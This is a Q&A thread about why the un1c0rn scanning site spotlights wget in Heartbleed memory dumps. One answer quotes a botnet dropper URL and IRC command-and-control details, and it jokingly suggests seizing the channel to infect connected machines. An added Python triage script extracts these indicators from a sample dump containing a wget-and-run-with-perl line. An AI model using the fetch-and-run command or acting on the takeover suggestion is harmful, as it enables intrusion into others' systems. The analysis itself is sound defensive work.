
What's the point of spotlighting wget on heartbleed dumps?

I'm specifically talking about this, which is the first page of wget occurrences in heartbleed dumps.

They put this page as a link at the top of the main page as if that is relevant in some way.

I can understand the reason behind exposing email= and password= and bitcoin and so on, but what about wget?

Is it because it might reveal system paths or potential RCIs, or is it because it exposes a system with heartbleed and thus wget - which is shown to be used - is also vulnerable to it?

user40242

2 Answers


All the links that were up there weren't necessarily security issues.

That wget for example was highlighting bots crawling webservers and giving security researchers some fresh blood to start looking for a C&C ;)

More details:

The bots are crawling the internet like us; here, when you see a wget ( http://un1c0rn.net/host/195.154.5.171 ) after an HTTP header, it means the bot tried to execute PHP code by injecting it in the request on the target system.

This code gives you the remote location of the script supposed to infect the machine and gives you some useful information to start a new hunt ;)

Here you can see the infection script is there:

hxxp://208.85.177.238/.x/hb/php08

And here is the information related to that botnet:

$servidor='194.24.228.203' unless $servidor; my $porta='443'; my @canais=("#allornothing"); my @adms=("Kelevra");

You could be nice and track the filthy mofo ... You could be bad, and take that IRC room, and even without knowing the password for the botnet administration, list IPs, infect the machines connected to the IRC channel like they were infected in the first place by the botnet and thank the botnet for all those vulnerable hosts just given to you.

  • Thank you very much! It's a shame that such a project has received so little support... Would you accept PP donations for those who don't own btc? – user40242 Oct 02 '14 at 13:02
  • Sadly, due to the nature of the project, we can't. I can however recommend [BTC-E](https://btc-e.com) which has always been safe for me. It supports a lot of money providers. – Project Unicorn Oct 06 '14 at 18:55
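A small triage script for the kind of dump text the answer describes, added here as an example (it is not code from the question, the answer or un1c0rn): it pulls the URL a wget call would fetch and the IRC C&C fields out of a constructed dump sample, and defangs the URL so it can go into a report. The sample, its addresses and everything other than the `$servidor`/`$porta`/`@canais`/`@adms` names quoted in the answer are assumptions.

```python
import re

# Constructed sample of the kind of text a Heartbleed memory dump can contain:
# a bot's HTTP request whose body shells out to wget, followed by a fragment
# of the dropped Perl IRC bot's configuration (addresses are documentation
# ranges, not real indicators).
SAMPLE_DUMP = """\
POST /index.php HTTP/1.1
Host: www.example.invalid
User-Agent: Mozilla/5.0

<?php system("cd /tmp; wget -q http://203.0.113.10/.x/hb/php08 -O .s; perl .s"); ?>
$servidor='198.51.100.7' unless $servidor; my $porta='443'; my @canais=("#example"); my @adms=("someone");
"""

# wget invocation: optional flags, then the URL being fetched.
WGET_RE = re.compile(r"\bwget\s+(?:-\S+\s+)*(https?://[^\s'\";)]+)")
# Scalar and list assignments in the Perl bot config (names as seen in the answer).
SCALAR_RE = r"\$%s\s*=\s*'([^']*)'"
LIST_RE = r"@%s\s*=\s*\(([^)]*)\)"


def defang(url: str) -> str:
    """Make a URL safe to paste into a report (hxxp://, [.] in the host)."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def extract_wget_urls(dump: str) -> list[str]:
    """Return every URL a wget command in the dump would download, defanged."""
    return [defang(m.group(1)) for m in WGET_RE.finditer(dump)]


def extract_irc_config(dump: str) -> dict:
    """Pull C&C host/port, channels and admin nicks out of the Perl config."""
    cfg = {}
    for key in ("servidor", "porta"):
        m = re.search(SCALAR_RE % key, dump)
        if m:
            cfg[key] = m.group(1)
    for key in ("canais", "adms"):
        m = re.search(LIST_RE % key, dump)
        if m:
            cfg[key] = [v.strip().strip("\"'") for v in m.group(1).split(",") if v.strip()]
    return cfg


def triage(dump: str) -> dict:
    """One record per dump: dropper URLs plus the botnet's IRC details."""
    return {"dropper_urls": extract_wget_urls(dump), "irc": extract_irc_config(dump)}


if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```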

That seems to be just whatever memory they grabbed via heartbleed. It looks like a PHP script executing wget, which was probably in the memory of the server being scanned.

David
  • Yeah sure, that's what **Un1c0rn** does: they scan for common vulnerabilities and then dump data (db, memory leaks, ...). But why did they put a _wget_ index like that was important? – user40242 Jul 17 '14 at 17:34
  • As far as I know, it's basically automated. Target was vulnerable to heartbleed, here's the data we got: – David Jul 17 '14 at 17:36
  • Yes indeed, but it is not the case of the "spotlights" they put on the almost-top of the page. I also think I put that link in a confusing way: I'm mostly referring to the spotlights you have up [here](http://un1c0rn.net/?module=hosts&action=list) that - if you click on `wget` - will point to a list of targets w/ heartbleed and then the single dump. – user40242 Jul 17 '14 at 17:42
  • @user40242, I think your question about "why" has been answered about as well as one could expect. Any further comments/complaints/rants should be directed to the authors/administrators of that web site. – D.W. Jul 23 '14 at 23:36
  • @D.W. Uhmmm I don't think so: I'm not asking why `wget` is on a dump (as Un1c0rn is automated, so there's no intention). I'm asking why it is highlighted as if it were a **nasty** security issue. So the real question is not really about Un1c0rn, rather on what's the deal with `wget` on a `heartbleed`. – user40242 Jul 24 '14 at 09:50